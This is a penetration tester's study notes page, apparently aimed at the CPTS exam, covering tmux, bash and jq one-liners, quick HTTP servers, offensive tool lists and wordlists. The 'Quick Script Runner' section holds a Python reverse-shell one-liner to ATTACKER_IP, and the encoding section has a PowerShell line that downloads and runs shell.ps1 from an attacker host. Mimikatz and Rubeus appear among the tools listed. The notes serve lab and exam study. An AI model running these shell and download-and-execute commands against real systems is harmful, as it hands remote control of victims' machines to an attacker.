Pentest_Notes

🧰 Miscellaneous / General Tooling

Organized notes for general tools, tmux, useful scripts, and productivity. Last Updated: 2026-03-27

Tmux

Overview

Tmux is a terminal multiplexer — essential for penetration testing. It allows multiple terminal sessions within a single window, session persistence, and logging.

Essential Keybindings

Default prefix: Ctrl+b (common custom: Ctrl+a)

Action Keybinding
New session tmux new -s <name>
Detach prefix + d
Reattach tmux attach -t <name>
List sessions tmux ls
New window prefix + c
Next window prefix + n
Previous window prefix + p
Split horizontal prefix + "
Split vertical prefix + %
Toggle panes prefix + o
Kill pane prefix + x
Kill window prefix + &
Rename window prefix + ,
Rename session prefix + $
Resize pane prefix + Alt+Arrow
Scroll mode prefix + [
Zoom pane (toggle) prefix + z
Copy mode prefix + [ → select → prefix + ]

Tmux Logging Plugin

# Install tmux plugin manager
git clone https://github.com/tmux-plugins/tpm ~/.tmux/plugins/tpm

# Add to ~/.tmux.conf:
set -g @plugin 'tmux-plugins/tmux-logging'

# Install plugins: prefix + I

# Logging keybindings:
# prefix + Shift+P     → Toggle logging (current pane)
# prefix + Alt+Shift+P → Save complete history
# prefix + Alt+p       → Screenshot current pane

⚠️ CPTS Exam Tip: Enable tmux logging IMMEDIATELY at the start of the exam. This captures every command and output as evidence.

# Set prefix to Ctrl+a
unbind C-b
set -g prefix C-a
bind C-a send-prefix

# Enable mouse
set -g mouse on

# Start window numbering at 1
set -g base-index 1
setw -g pane-base-index 1

# Increase scrollback
set -g history-limit 50000

# Plugins
set -g @plugin 'tmux-plugins/tpm'
set -g @plugin 'tmux-plugins/tmux-logging'
set -g @plugin 'tmux-plugins/tmux-resurrect'

# Initialize TPM
run '~/.tmux/plugins/tpm/tpm'

Useful Bash One-Liners

IP Address Extraction

# Extract IPs from a file
grep -oE '((1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.){3}(1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])' FILE

# Alternative
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' FILE

Subnet Loop Operations

# Loop through /24 subnet
for ip in $(seq 1 254); do echo "10.10.10.$ip"; done

# Quick ping sweep
for ip in $(seq 1 254); do (ping -c 1 10.10.10.$ip | grep "64 bytes" &); done

# Banner grab across subnet
for ip in $(cat online); do echo "===$ip===" && nc -w 1 -nv $ip 80 <<< "HEAD / HTTP/1.0\r\n\r\n" 2>&1 | head -5; done

File Operations

# Find files modified in last 60 minutes
find / -type f -mmin -60 2>/dev/null

# Find files by extension
find / -type f -name "*.conf" 2>/dev/null

# Sort and deduplicate
sort -u file.txt > file_unique.txt

# Count lines in file
wc -l file.txt

# Compare two files
diff file1.txt file2.txt
comm -23 <(sort file1.txt) <(sort file2.txt)

Text Processing

Grep Tricks

# Recursive search with context
grep -rn "password" /path/ --include="*.conf" -C 2

# Case-insensitive
grep -i "password" file.txt

# Inverse match (exclude)
grep -v "comment\|#" file.txt

# Count matches
grep -c "pattern" file.txt

# Only filenames
grep -rl "password" /path/

Awk & Sed

# Extract specific column
awk '{print $2}' file.txt

# Extract field with custom delimiter
awk -F: '{print $1}' /etc/passwd

# Replace text in file
sed -i 's/old/new/g' file.txt

# Remove blank lines
sed '/^$/d' file.txt

# Print specific line range
sed -n '10,20p' file.txt

Jq (JSON Processing)

# Pretty print
cat file.json | jq '.'

# Extract specific field
cat file.json | jq '.users[].name'

# Filter by condition
cat file.json | jq '.[] | select(.status == "active")'

# BloodHound JSON — extract descriptions
cat domain_users.json | jq '.data[] | select(.Properties.description != null) | {name: .Properties.name, desc: .Properties.description}'

Python Utilities

Quick HTTP Server

# HTTP server (serves current directory)
python3 -m http.server 80

# HTTPS server (self-signed)
python3 -c "
import http.server, ssl
server = http.server.HTTPServer(('0.0.0.0', 443), http.server.SimpleHTTPRequestHandler)
server.socket = ssl.wrap_socket(server.socket, certfile='cert.pem', keyfile='key.pem', server_side=True)
server.serve_forever()
"

# Upload server
python3 -m uploadserver 80

Quick Script Runner

# One-liner Python reverse shell (for quick testing)
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'

Precompiled Binaries & Tools

Binary Repositories

Repository URL Contents
jakobfriedl’s precompiled https://github.com/jakobfriedl/precompiled-binaries Common Windows tools
SharpCollection https://github.com/Flangvik/SharpCollection .NET offensive tools
Static Binaries https://github.com/andrew-d/static-binaries Static-linked Linux tools

Common Tools to Have Ready

Tool Purpose Transfer Method
LinPEAS Linux enumeration HTTP download
WinPEAS Windows enumeration HTTP/SMB download
pspy64 Linux process monitor HTTP download
SharpHound.exe BloodHound collection HTTP/SMB download
Rubeus.exe Kerberos attacks HTTP/SMB download
Mimikatz.exe Credential dumping HTTP/SMB download
Seatbelt.exe Windows enumeration HTTP/SMB download
PowerUp.ps1 Windows privesc HTTP download
PowerView.ps1 AD enumeration HTTP download
Snaffler.exe File discovery HTTP/SMB download
Ligolo-ng agent Pivoting HTTP/SMB download
Chisel Pivoting/tunneling HTTP download
nc.exe / ncat.exe Reverse shell HTTP/SMB download
socat Bidirectional relay HTTP download

Wordlist Reference

Common Wordlist Locations

/usr/share/wordlists/rockyou.txt
/usr/share/seclists/
/opt/SecLists/

SecLists Most-Used Paths

Purpose Path
Directory brute-force Discovery/Web-Content/directory-list-2.3-medium.txt
File names Discovery/Web-Content/raft-large-files.txt
Words Discovery/Web-Content/raft-large-words.txt
DNS subdomains Discovery/DNS/subdomains-top1million-110000.txt
Usernames Usernames/xato-net-10-million-usernames.txt
Top usernames Usernames/top-usernames-shortlist.txt
Name-based usernames Usernames/Names/names.txt
Parameters Discovery/Web-Content/burp-parameter-names.txt
XSS payloads Fuzzing/XSS/XSS-BruteLogic.txt
Command injection Fuzzing/command-injection-commix.txt
Special characters Fuzzing/special-chars.txt
Community strings Discovery/SNMP/common-snmp-community-strings.txt

Nifty Tricks

/etc/hosts Management

# Add hostname
echo "<IP> hostname.domain.com hostname" | sudo tee -a /etc/hosts

# Quick add multiple hosts
sudo sh -c 'cat >> /etc/hosts << EOF
10.10.10.1  dc01.domain.com dc01
10.10.10.2  web01.domain.com web01
10.10.10.3  db01.domain.com db01
EOF'

Screen / Terminal Management

# Screen sessions
screen -list        # List sessions
screen -S pentest   # Create named session
screen -d -r pentest # Reattach

# Check tmux sessions from inside screen (or vice versa)
tmux list-panes

Quick Encoding / Decoding

# Base64 encode
echo -n 'text' | base64

# Base64 decode
echo 'dGV4dA==' | base64 -d

# URL encode
python3 -c "import urllib.parse; print(urllib.parse.quote('test string'))"

# URL decode
python3 -c "import urllib.parse; print(urllib.parse.unquote('test%20string'))"

# PowerShell Base64 for commands (UTF-16LE required)
echo -n 'IEX(New-Object Net.WebClient).DownloadString("http://10.10.10.1/shell.ps1")' | iconv -t utf-16le | base64 -w 0

Checking for Connectivity

# Listener to verify reverse connection
sudo tcpdump -i tun0 icmp

# On target:
ping -c 1 <ATTACKER_IP>

Environment Variables (Attacker Setup)

# Useful aliases and variables to set at the start of engagement
export TARGET=10.10.10.10
export DC=10.10.10.1
export DOMAIN=domain.com
export SECLIST=/usr/share/seclists
export ATTACKER_IP=$(ip addr show tun0 | grep 'inet ' | awk '{print $2}' | cut -d/ -f1)

# Add to ~/.bashrc for persistence
alias serve='python3 -m http.server 80'
alias listen='rlwrap nc -lnvp'

Common Pitfalls / Gotchas

References & Further Reading